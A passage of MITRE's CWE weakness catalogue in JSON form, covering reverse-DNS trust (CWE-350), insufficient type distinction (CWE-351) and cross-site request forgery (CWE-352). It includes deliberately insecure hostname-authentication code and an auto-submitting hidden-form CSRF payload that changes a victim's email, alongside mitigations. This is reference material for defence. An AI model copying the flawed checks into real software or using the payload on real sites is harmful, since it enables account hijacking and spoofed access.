true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."},{"Intro_Text":"In these examples, a connection is established if a request is made by a trusted host.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) &amp; serv, sizeof(serv));while (1) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);h=gethostbyname(inet_ntoa(cliAddr.sin_addr));if (h-&gt;h_name==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) &amp; cli, &amp;clilen);","xhtml:br":["","","",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress IPAddress = rp.getAddress();int port = rp.getPort();if ((rp.getHostName()==...) &amp; (in==...)) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port);outSock.send(sp);","xhtml:br":["","",""]}}}}}}],"Body_Text":"These examples check if a request is from a trusted host before responding to a request, but the code only verifies the hostname as stored in the request packet. An attacker can spoof the hostname, thus impersonating a trusted client."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1488","Description":"Does not do double-reverse lookup to prevent DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1488"},{"Reference":"CVE-2001-1500","Description":"Does not verify reverse-resolved hostnames in DNS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1500"},{"Reference":"CVE-2000-1221","Description":"Authentication bypass using spoofed reverse-resolved DNS hostnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1221"},{"Reference":"CVE-2002-0804","Description":"Authentication bypass using spoofed reverse-resolved DNS hostnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0804"},{"Reference":"CVE-2001-1155","Description":"Filter does not properly check the result of a reverse DNS lookup, which could allow remote attackers to bypass intended access restrictions via DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"},{"Reference":"CVE-2004-0892","Description":"Reverse DNS lookup used to spoof trusted content in intermediary.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0892"},{"Reference":"CVE-2003-0981","Description":"Product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0981"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Trusted Reverse DNS"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trusting self-reported DNS name"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"275"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"89"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 15: Not Updating Easily.&#34; Page 231"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 24: Trusting Network Name Resolution.&#34; Page 361"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 16, &#34;DNS Spoofing&#34;, Page 1002"}}]},"Notes":{"Note":{"#text":"CWE-350, CWE-247, and CWE-292 were merged into CWE-350 in CWE 2.5. CWE-247 was originally derived from Seven Pernicious Kingdoms, CWE-350 from PLOVER, and CWE-292 from CLASP. All taxonomies focused closely on the use of reverse DNS for authentication of incoming requests.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Improperly Trusted Reverse DNS","attr":{"@_Date":"2013-07-17"}}}},"351":{"attr":{"@_ID":"351","@_Name":"Insufficient Type Distinction","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly distinguish between different types of elements in a way that leads to insecure behavior.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2260","Description":"Browser user interface does not distinguish between user-initiated and synthetic events.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2260"},{"Reference":"CVE-2005-2801","Description":"Product does not compare all required data in two separate elements, causing it to think they are the same, leading to loss of ACLs. Similar to Same Name error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Type Distinction"}},"Notes":{"Note":{"#text":"Overlaps others, e.g. Multiple Interpretation Errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"352":{"attr":{"@_ID":"352","@_Name":"Cross-Site Request Forgery (CSRF)","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Stable"},"Description":"The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.","Extended_Description":"When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"346","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"441","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"642","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"613","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Session Riding"},{"Term":"Cross Site Reference Forgery"},{"Term":"XSRF"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Non-Repudiation","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data","DoS: Crash, Exit, or Restart"],"Note":"The consequences will vary depending on the nature of the functionality that is vulnerable to CSRF. An attacker could effectively perform any operations as the victim. If the victim is an administrator or privileged user, the consequences may include obtaining complete control over the web application - deleting or stealing data, uninstalling the product, or using it to launch other attacks against all of the product\'s users. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim\'s privileges."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual analysis can be useful for finding this weakness, and for minimizing false positives assuming an understanding of business logic. However, it might not achieve desired code coverage within limited time constraints. For black-box analysis, if credentials are not known for privileged accounts, then the most security-critical portions of the application may not receive sufficient attention.","Consider using OWASP CSRFTester to identify potential issues and aid in manual analysis."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis","Description":"CSRF is currently difficult to detect reliably using automated techniques. This is because each application has its own implicit security policy that dictates which requests can be influenced by an outsider and automatically performed on behalf of a user, versus which requests require strong confidence that the user intends to make the request. For example, a keyword search of the public portion of a web site is typically expected to be encoded within a link that can be launched automatically when the user clicks on the link.","Effectiveness":"Limited"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Web Application Scanner"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"SOAR Partial"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, use anti-CSRF packages such as the OWASP CSRFGuard. [REF-330]","Another example is the ESAPI Session Management control, which includes a component for CSRF. [REF-45]"]}},{"Phase":"Implementation","Description":"Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script."},{"Phase":"Architecture and Design","Description":"Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [REF-332]","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"Phase":"Architecture and Design","Description":"Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use the \\"double-submitted cookie\\" method as described by Felten and Zeller:","When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user\'s machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same.","Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult.","This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [REF-331]"]},"Effectiveness_Notes":"Note that this can probably be bypassed using XSS (CWE-79), or when using web technologies that enable the attacker to read raw headers from HTTP requests."},{"Phase":"Architecture and Design","Description":"Do not use the GET method for any request that triggers a state change."},{"Phase":"Implementation","Description":"Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79). An attacker could use XSS to generate a spoofed Referer, or to generate a malicious request from a page whose Referer would be allowed."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example PHP code attempts to secure the form submission process by validating that the user submitting the form has a valid session. A CSRF attack would not be prevented by this countermeasure because the attacker forges a request through the user\'s web browser in which a valid session already exists.","Body_Text":["The following HTML is intended to allow a user to update a profile.","profile.php contains the following code.","This code may look protected since it checks for a valid session. However, CSRF attacks can be staged from virtually any tag or HTML construct, including image tags, links, embed or object tags, or other attributes that load background images.","The attacker can then host code that will silently change the username and email address of any user that visits the page while remaining logged in to the target web application. The code might be an innocent-looking web page such as:","Notice how the form contains hidden fields, so when it is loaded into the browser, the user will not notice it. Because SendAttack() is defined in the body\'s onload attribute, it will be automatically called when the victim loads the web page.","Assuming that the user is already logged in to victim.example.com, profile.php will see that a valid user session has been established, then update the email address to the attacker\'s own address. At this stage, the user\'s identity has been compromised, and messages sent through this profile could be sent to the attacker\'s address."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"/url/profile.php\\" method=\\"post\\"&gt;&lt;input type=\\"text\\" name=\\"firstname\\"/&gt;&lt;input type=\\"text\\" name=\\"lastname\\"/&gt;&lt;br/&gt;&lt;input type=\\"text\\" name=\\"email\\"/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Update\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"// initiate the session in order to validate sessionssession_start();if (! session_is_registered(\\"username\\")) {}update_profile();function update_profile {}","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["//if the session is registered to a valid user then allow update","// The user session is valid, so process the request","// and update the information"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"echo \\"invalid session detected!\\";[...]exit;","xhtml:br":["","","","","",""],"xhtml:i":"// Redirect user to login page"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"SendUpdateToDatabase($_SESSION[\'username\'], $_POST[\'email\']);[...]echo \\"Your profile has been successfully updated.\\";","xhtml:br":["","","","","",""],"xhtml:i":["// read in the data from $POST and send an update","// to the database"]}}]}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;SCRIPT&gt;function SendAttack () {}&lt;/SCRIPT&gt;&lt;BODY onload=\\"javascript:SendAttack();\\"&gt;&lt;form action=\\"http://victim.example.com/profile.php\\" id=\\"form\\" method=\\"post\\"&gt;&lt;input type=\\"hidden\\" name=\\"firstname\\" value=\\"Funny\\"&gt;&lt;input type=\\"hidden\\" name=\\"lastname\\" value=\\"Joke\\"&gt;&lt;br/&gt;&lt;input type=\\"hidden\\" name=\\"email\\"&gt;&lt;/form&gt;","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"#text":"form.email = \\"attacker@example.com\\";form.submit();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// send to profile.php"}}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1703","Description":"Add user accounts via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1703"},{"Reference":"CVE-2004-1995","Description":"Add user accounts via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1995"},{"Reference":"CVE-2004-1967","Description":"Arbitrary code execution by specifying the code in a crafted img tag or URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1967"},{"Reference":"CVE-2004-1842","Description":"Gain administrative privileges via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1842"},{"Reference":"CVE-2005-1947","Description":"Delete a victim\'s information via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1947"},{"Reference":"CVE-2005-2059","Description":"Change another user\'s settings via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2059"},{"Reference":"CVE-2005-1674","Description":"Perform actions as administrator via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1674"},{"Reference":"CVE-2009-3520","Description":"modify password for the administrator","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3520"},{"Reference":"CVE-2009-3022","Description":"CMS allows modification of configuration via CSRF attack against the administrator","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3022"},{"Reference":"CVE-2009-3759","Description":"web interface allows password changes or stopping a virtual machine via CSRF","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3759"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-Site Request Forgery (CSRF)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A5","Entry_Name":"Cross Site Request Forgery (CSRF)","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":9,"Entry_Name":"Cross-site Request Forgery"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"462"}},{"attr":{"@_CAPEC_ID":"467"}},{"attr":{"@_CAPEC_ID":"62"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and&#xA; Response Splitting).&#34; Page 37"}},{"attr":{"@_External_Reference_ID":"REF-329"}},{"attr":{"@_External_Reference_ID":"REF-330"}},{"attr":{"@_External_Reference_ID":"REF-331"}},{"attr":{"@_External_Reference_ID":"REF-332"}},{"attr":{"@_External_Reference_ID":"REF-333"}},{"attr":{"@_External_Reference_ID":"REF-334"}},{"attr":{"@_External_Reference_ID":"REF-335"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-956"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"There can be a close relationship between XSS and CSRF (CWE-352).  An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload.  A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user\'s profile and add the attacker as a MySpace friend.  MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause."},{"attr":{"@_Type":"Theoretical"},"xhtml:p":"The CSRF topology is multi-channel:","xhtml:ol":{"xhtml:li":["Attacker (as outsider) to intermediary (as user). The interaction point is either an external or internal channel.","Intermediary (as user) to server (as victim). The activation point is an internal channel."]}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Description, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"Tom Stracener","Modification_Date":"2009-05-20","Modification_Comment":"Added demonstrative example for profile."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationship_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"353":{"attr":{"@_ID":"353","@_Name":"Missing Support for Integrity Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum.","Extended_Description":"If integrity check values or \\"checksums\\" are omitted from a protocol, there is no way of 